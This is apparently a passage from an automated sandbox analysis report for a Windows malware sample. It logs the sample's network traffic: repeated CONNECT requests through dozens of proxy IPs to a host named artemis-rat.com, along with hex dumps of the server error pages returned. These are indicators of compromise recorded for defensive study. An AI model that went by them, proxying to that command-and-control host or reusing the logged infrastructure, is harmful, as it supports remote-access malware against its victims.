70 78 20 33 70 78 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 65 66 65 66 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 31 70 78 3b 20 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 64 64 64 3b 0a 20 20 20 20 7d 0a 20 20 20 20 74 62 6f 64 79 20 74 68 20 7b 20 77 69 64 74 68 3a 31 32 65 6d 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 72 69 67 68 74 3b 20 63 6f 6c 6f 72 3a 23 36 36 36 3b 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 2e 35 65 6d 3b 20 7d 0a 20 20 20 20 74 61 62 6c 65 2e 76 61 72 73 20 7b 20 6d 61 72 67 69 6e 3a 35 70 78 20 30 20 32 70 78 20 34 30 70 78 3b 20 7d 0a 20 20 20 20 74 61 62 6c
                                              Data Ascii: 10299<!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <meta name="robots" content="NONE,NOARCHIVE"> <title>DisallowedHost at /</title> <style type="text/css"> html * { padding:0; margin:0; } body * { padding:10px 20px; } body * * { padding:0; } body { font:small sans-serif; } body>div { border-bottom:1px solid #ddd; } h1 { font-weight:normal; } h2 { margin-bottom:.8em; } h2 span { font-size:80%; color:#666; font-weight:normal; } h3 { margin:1em 0 .5em 0; } h4 { margin:0 0 .5em 0; font-weight: normal; } code, pre { font-size: 100%; white-space: pre-wrap; } table { border:1px solid #ccc; border-collapse: collapse; width:100%; background:white; } tbody td, tbody th { vertical-align:top; padding:2px 3px; } thead th { padding:1px 6px 1px 3px; background:#fefefe; text-align:left; font-weight:normal; font-size:11px; border:1px solid #ddd; } tbody th { width:12em; text-align:right; color:#666; padding-right:.5em; } table.vars { margin:5px 0 2px 40px; } tabl
                                              Mar 11, 2024 08:37:20.283262014 CET1286INData Raw: 65 2e 76 61 72 73 20 74 64 2c 20 74 61 62 6c 65 2e 72 65 71 20 74 64 20 7b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 6d 6f 6e 6f 73 70 61 63 65 3b 20 7d 0a 20 20 20 20 74 61 62 6c 65 20 74 64 2e 63 6f 64 65 20 7b 20 77 69 64 74 68 3a 31 30 30 25 3b
                                              Data Ascii: e.vars td, table.req td { font-family:monospace; } table td.code { width:100%; } table td.code pre { overflow:hidden; } table.source th { color:#666; } table.source td { font-family:monospace; white-space:pre; border-bottom:1px
                                              Mar 11, 2024 08:37:20.283349037 CET1286INData Raw: 61 63 6b 67 72 6f 75 6e 64 3a 23 65 65 65 3b 20 7d 0a 20 20 20 20 23 74 65 6d 70 6c 61 74 65 2c 20 23 74 65 6d 70 6c 61 74 65 2d 6e 6f 74 2d 65 78 69 73 74 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 36 66 36 66 36 3b 20 7d 0a 20 20 20 20 23
                                              Data Ascii: ackground:#eee; } #template, #template-not-exist { background:#f6f6f6; } #template-not-exist ul { margin: 0 0 10px 20px; } #template-not-exist .postmortem-section { margin-bottom: 3px; } #unicode-hint { background:#eee; } #
                                              Mar 11, 2024 08:37:20.283391953 CET1286INData Raw: 6c 61 63 65 28 2f 5c 2d 2f 67 2c 20 22 5c 5c 2d 22 29 3b 0a 20 20 20 20 20 20 20 20 76 61 72 20 6f 52 65 67 45 78 70 20 3d 20 6e 65 77 20 52 65 67 45 78 70 28 22 28 5e 7c 5c 5c 73 29 22 20 2b 20 73 74 72 43 6c 61 73 73 4e 61 6d 65 20 2b 20 22 28
                                              Data Ascii: lace(/\-/g, "\\-"); var oRegExp = new RegExp("(^|\\s)" + strClassName + "(\\s|$)"); var oElement; for(var i=0; i<arrElements.length; i++){ oElement = arrElements[i]; if(oRegExp.test(oElement.clas
                                              Mar 11, 2024 08:37:20.283426046 CET1286INData Raw: 73 2e 74 65 78 74 43 6f 6e 74 65 6e 74 20 3d 20 73 2e 74 65 78 74 43 6f 6e 74 65 6e 74 20 3d 3d 20 75 61 72 72 20 3f 20 64 61 72 72 20 3a 20 75 61 72 72 3b 0a 20 20 20 20 20 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 0a 20 20 20 20 7d 0a 20 20 20
                                              Data Ascii: s.textContent = s.textContent == uarr ? darr : uarr; return false; } function switchPastebinFriendly(link) { s1 = "Switch to copy-and-paste view"; s2 = "Switch back to interactive view"; link.textContent = link.
                                              Mar 11, 2024 08:37:20.283540010 CET1286INData Raw: 20 31 31 33 3c 2f 74 64 3e 0a 20 20 20 20 3c 2f 74 72 3e 0a 0a 20 20 20 20 3c 74 72 3e 0a 20 20 20 20 20 20 3c 74 68 3e 50 79 74 68 6f 6e 20 45 78 65 63 75 74 61 62 6c 65 3a 3c 2f 74 68 3e 0a 20 20 20 20 20 20 3c 74 64 3e 2f 75 73 72 2f 62 69 6e
                                              Data Ascii: 113</td> </tr> <tr> <th>Python Executable:</th> <td>/usr/bin/python</td> </tr> <tr> <th>Python Version:</th> <td>2.7.17</td> </tr> <tr> <th>Python Path:</th> <td><pre>[&#39;/usr/lib
                                              Mar 11, 2024 08:37:20.283602953 CET1286INData Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6f 6c 20 73 74 61 72 74 3d 22 33 34 22 20 63 6c 61 73 73 3d 22 70 72 65 2d 63 6f 6e 74 65 78 74 22 20 69 64 3d 22 70 72 65 31 34 30 31 30 34 38 38 34 36 39 33 36 36 34 22 3e 0a 20 20 20 20 20
                                              Data Ascii: <ol start="34" class="pre-context" id="pre140104884693664"> <li onclick="toggle('pre140104884693664', 'post140104884693664')"><pre> This decorator is automatically applied to all middlewar
                                              Mar 11, 2024 08:37:20.283639908 CET1286INData Raw: 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6f 6c 20 73 74 61 72 74 3d 22 34 31 22 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 78 74 2d 6c 69 6e 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 6f 6e 63 6c 69 63
                                              Data Ascii: <ol start="41" class="context-line"> <li onclick="toggle('pre140104884693664', 'post140104884693664')"><pre> response = get_response(request)</pre> <span>...</span></li></ol>
                                              Mar 11, 2024 08:37:20.283685923 CET1286INData Raw: 6f 6d 6d 61 6e 64 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 23 22 20 6f 6e 63 6c 69 63 6b 3d 22 72 65 74 75 72 6e 20 76 61 72 54 6f 67 67
                                              Data Ascii: ommands"> <a href="#" onclick="return varToggle(this, '140104884693664')"><span>&#x25b6;</span> Local vars</a> </div> <table class="vars" id="v140104884693664">
                                              Mar 11, 2024 08:37:20.283720970 CET1286INData Raw: 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 63 6f 64 65 3e 2f 75 73 72 2f 6c 6f 63 61 6c 2f 6c 69 62 2f 70 79 74 68 6f 6e 32 2e 37 2f 64 69 73 74 2d 70 61 63 6b 61 67 65 73 2f 64 6a 61 6e 67 6f 2f 75 74 69 6c 73 2f 64 65 70 72 65 63 61 74 69 6f 6e
                                              Data Ascii: "> <code>/usr/local/lib/python2.7/dist-packages/django/utils/deprecation.py</code> in <code>__call__</code> <div class="context" id="c140104884692064"> <ol start="131" class="pre
                                              Mar 11, 2024 08:37:20.623903990 CET1286INData Raw: 20 68 61 73 61 74 74 72 28 73 65 6c 66 2c 20 26 23 33 39 3b 70 72 6f 63 65 73 73 5f 72 65 71 75 65 73 74 26 23 33 39 3b 29 3a 3c 2f 70 72 65 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20
                                              Data Ascii: hasattr(self, &#39;process_request&#39;):</pre></li> </ol> <ol start="138" class="context-line"> <li onclick="toggle('pre140104884692064', 'post140104884692064')"><


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              703192.168.2.452162190.110.226.162807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.878443003 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:27.347913980 CET811INHTTP/1.1 500 Internal Server Error
                                              Date: Mon, 11 Mar 2024 07:37:27 GMT
                                              Server: Apache/2.4.57 (Ubuntu)
                                              Content-Length: 619
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 73 6f 70 6f 72 74 65 74 69 40 63 6f 64 65 31 30 30 2e 63 6f 6d 2e 70 79 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at soporteti@code100.com.py to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.57 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              704192.168.2.452166103.179.139.17080807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.891757011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.663188934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.248637915 CET19INHTTP/1.1 200 OK


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              705192.168.2.452100103.86.109.38807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.894265890 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              706192.168.2.452098185.191.236.16231287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.899468899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.858192921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.340615034 CET39INHTTP/1.1 200 Connection established


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              707192.168.2.45138542.61.48.21980007284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.899756908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.275963068 CET74INHTTP/1.1 200 OK
                                              date: Mon, 11 Mar 2024 07:17:06 GMT
                                              server: svcproxy


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              708192.168.2.449849192.163.201.131408867284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.910423040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              709192.168.2.452366104.19.124.112807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.918153048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.072649002 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:19 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              710192.168.2.451214148.72.206.8425367284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.918818951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.053837061 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              711192.168.2.45221447.242.234.237807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.972364902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              712192.168.2.452246121.182.138.71807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.973203897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              713192.168.2.452064102.132.50.680807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.973897934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              714192.168.2.45128782.223.121.7249857284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.973999977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.053828001 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.163527966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:32.163553953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:44.366322994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:56.381818056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:08.522613049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:32.522551060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              715192.168.2.45234572.206.181.97649437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.975595951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              716192.168.2.452339184.185.2.1241457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.977050066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              717192.168.2.452277147.75.34.85100117284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.977514982 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Mar 11, 2024 08:37:20.279921055 CET65INHTTP/1.1 200 Connection Established
                                              Proxy-Agent: Zscaler/6.3


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              718192.168.2.452187119.18.149.3480807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.977560997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              719192.168.2.452227103.247.21.9880807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.977750063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.866265059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.531934023 CET19INHTTP/1.1 200 OK


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              720192.168.2.452278176.253.53.25807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.977829933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.697002888 CET736INHTTP/1.1 500 Internal Server Error
                                              Date: Mon, 11 Mar 2024 07:39:06 GMT
                                              Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k
                                              Content-Length: 530
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 61 64 6d 69 6e 40 65 78 61 6d 70 6c 65 2e 63 6f 6d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 